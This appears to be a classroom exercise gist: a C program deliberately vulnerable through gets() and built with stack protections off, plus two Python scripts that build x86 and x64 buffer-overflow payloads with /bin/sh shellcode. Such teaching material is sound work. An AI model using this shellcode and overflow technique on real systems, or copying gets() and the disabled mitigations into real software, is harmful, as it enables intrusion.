Created
October 27, 2019 06:57
Vulnerable program for ITLAW&Security
from struct import *
"""
Exploit for run_as_root x86
"""
# Classroom proof-of-concept input for the 32-bit build of the run_as_root
# exercise program. That program reads the password with gets() into a
# 128-byte stack buffer, so any input longer than the buffer overwrites
# adjacent stack memory, including the saved return address.
# The exercise binary is built with -fno-stack-protector -z execstack -no-pie,
# i.e. with the stack canary, non-executable stack and PIE switched off.
# NOTE(review): the hard-coded address below is a stack address from the
# author's own session; presumably it also assumes ASLR is disabled. Confirm
# before treating this file as reproducible.
def solve():
    """Build the overflow input and write it to a file named "payload".

    Layout, in order: 140 filler bytes, one 32-bit little-endian address,
    16 bytes of 0x90, then the shellcode bytes. Returns None.
    """
    # Opaque machine-code bytes supplied by the author; the last seven bytes
    # are the ASCII string "/bin/sh".
    shellcode = b"\xeb\x0b\x5b\x31\xc0\x31\xc9\x31\xd2\xb0\x0b\xcd\x80\xe8\xf0\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68"  # shellcode
    exploit = b"A"*140  # padding: fills the 128-byte buffer and the stack bytes after it
    exploit += pack("<I", 0xffffd6f3)  # value for the saved return address (EIP on x86; the original comment said "rip")
    exploit += b"\x90"*16  # 0x90 is the x86 NOP opcode
    exploit += shellcode
    # write to file payload
    # NOTE(review): the handle is never closed explicitly; a `with open(...)`
    # block would guarantee the data is flushed and the descriptor released.
    f = open("payload", "wb")
    f.write(exploit)
# No `if __name__ == "__main__"` guard: the file is written on import as well
# as when the script is run directly.
solve()
from struct import *
"""
Exploit for run_as_root x64
"""
# Classroom proof-of-concept input for the 64-bit build of the run_as_root
# exercise program. That program reads the password with gets() into a
# 128-byte stack buffer, so any input longer than the buffer overwrites
# adjacent stack memory, including the saved return address.
# The exercise binary is built with -fno-stack-protector -z execstack -no-pie,
# i.e. with the stack canary, non-executable stack and PIE switched off.
# NOTE(review): the hard-coded address below is a stack address from the
# author's own session; presumably it also assumes ASLR is disabled. Confirm
# before treating this file as reproducible.
def solve():
    """Build the overflow input and write it to a file named "payload".

    Layout, in order: 136 filler bytes, one 64-bit little-endian address,
    16 bytes of 0x90, the shellcode bytes, then a single newline byte.
    Returns None.
    """
    # Opaque machine-code bytes supplied by the author.
    shellcode = b"\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05"  # shellcode
    exploit = b"A"*136  # padding: fills the 128-byte buffer and the stack bytes after it
    exploit += pack("<Q", 0x7fffffffe5e0)  # value for the saved return address (RIP on x86-64)
    #exploit += pack("<Q", 0xCCCCCCC)
    exploit += b"\x90"*16  # 0x90 is the x86 NOP opcode
    exploit += shellcode
    # write to file payload
    exploit += b"\x0a"  # add newline; gets() stops reading at a newline
    # NOTE(review): the handle is never closed explicitly; a `with open(...)`
    # block would guarantee the data is flushed and the descriptor released.
    f = open("payload", "wb")
    f.write(exploit)
# No `if __name__ == "__main__"` guard: the file is written on import as well
# as when the script is run directly.
solve()
#include<stdio.h>
#include<string.h>
//gcc run_as_root.c -o run_as_root -fno-stack-protector -z execstack -no-pie
/*
 * NOTE(review): this file is a deliberately vulnerable exercise target (the
 * page describes it as a "vuln program"), and the build line above disables
 * three standard mitigations: the stack canary (-fno-stack-protector), the
 * non-executable stack (-z execstack) and position-independent code (-no-pie).
 * Neither the code nor the flags should be copied into real software.
 */

/*
 * Prompt for a password on stdin and compare it with a hard-coded string.
 * Prints "exec command!" on a match and "Wrong Password!" otherwise; no
 * command is actually executed (see the todo below). Returns nothing.
 */
void run_cmd(){
    char password[128];
    printf("Password: ");
    /*
     * Defect (intentional for the exercise): gets() takes no length, so a
     * line longer than 127 characters writes past the end of password[] and
     * corrupts the stack frame, including the saved return address. gets()
     * was removed from the language in C11. The bounded form is
     *     fgets(password, sizeof password, stdin)
     * with its return value checked for NULL, followed by stripping the
     * trailing newline before the comparison.
     */
    gets(password);
    //correct password
    /*
     * The expected password is a string literal in the binary, so anyone who
     * can read the executable can recover it.
     */
    if(strcmp("st3v3_r00t_r00t", password) == 0){
        //todo : Execute Function
        //I don't know how to execute command in C I'll do it later!
        printf("exec command!\n");
    } else{ //wrong password
        printf("Wrong Password!\n");
    }
}

/*
 * Program entry point: prints the banner, then runs the password prompt.
 * NOTE(review): `void main()` is non-standard; a hosted C program should
 * declare `int main(void)` and return a status.
 */
void main(){
    printf("=====[ Run as Root ]=====\n");
    run_cmd();
}